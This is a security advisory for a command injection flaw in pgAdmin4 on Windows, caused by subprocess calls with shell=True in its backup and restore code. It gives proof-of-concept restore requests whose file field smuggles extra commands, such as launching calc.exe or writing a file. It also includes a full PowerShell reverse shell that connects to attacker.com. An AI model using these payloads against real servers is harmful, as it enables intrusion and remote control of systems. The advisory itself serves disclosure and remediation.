Command Injection in pgAdmin for Windows (CVE-2025-12763)

Summary

---

Command Injection vulnerability occurs in pgAdmin4 running on Windows environment due to the use of shell=True parameter in subprocess.Popen() when executing backup/restore processes. Attackers can execute arbitrary system commands through file path input.

Details

---

Reproduce step:

1.Login to pgAdmin4 on Windows environment
2.Connect to a database server
3.Select Restore function
4.Send the following body to POST /restore/job/<server_id> endpoint:

{
    "file": "backup.sql & calc.exe",
    "format": "custom",
    "database": "testdb"
}

5.Windows Calculator will be executed, confirming arbitrary command execution is possible

---

Issue Code:

web/pgadmin/misc/bgprocess/process_executor.py (Line 319-330):

def execute(argv):
    """
    This function will execute the background process
    """
    command = argv[1:]
    args = dict()

    # ... skip ...

    kwargs = dict()
    kwargs['close_fds'] = False
    kwargs['shell'] = True if _IS_WIN else False  # <-- Vulnerability: shell=True on Windows
    kwargs['env'] = os.environ.copy()

    process = Popen(
        command, stdout=PIPE, stderr=PIPE, stdin=None, **kwargs
    )

web/pgadmin/misc/bgprocess/processes.py (Line 346-354):

if os.name == 'nt':  # Windows
    DETACHED_PROCESS = 0x00000008
    from subprocess import CREATE_NEW_PROCESS_GROUP

    # ... skip ...

    p = Popen(
        cmd,  # cmd contains user input
        close_fds=False,
        env=env,
        stdout=stdout.fileno(),
        stderr=stderr.fileno(),
        stdin=stdin.fileno(),
        creationflags=(CREATE_NEW_PROCESS_GROUP | DETACHED_PROCESS)
    )

When shell=True is used on Windows, commands are executed through cmd.exe /c, which interprets shell metacharacters (&, |, ;, &&, ||). Without validation of user input, command injection is possible.

Proof of Concept (PoC) - Calculator Execution

---

1. Simple Command Execution (Calculator)

POST /restore/job/1
{
    "file": "C:\\backup.sql & calc.exe",
    "format": "custom",
    "database": "postgres"
}

Result: Windows Calculator is executed

2. File Creation

POST /restore/job/1
{
    "file": "backup.sql & echo HACKED > C:\\Windows\\Temp\\poc.txt",
    "format": "custom",
    "database": "postgres"
}

Result: C:\Windows\Temp\poc.txt file is created with "HACKED" content

Proof of Concept (PoC) - Reverse Shell

---

PowerShell Reverse Shell

POST /restore/job/1
{
    "file": "backup.sql & powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
    "format": "custom",
    "database": "postgres"
}

Impact

---

Authenticated attackers can execute arbitrary commands on Windows systems.

Remediation

In the patched version 9.10, the vulnerability was addressed by removing the shell=True option.
https://github.com/pgadmin-org/pgadmin4/commit/e374edc69239b3e02ecde895e27d9f9e488b87ee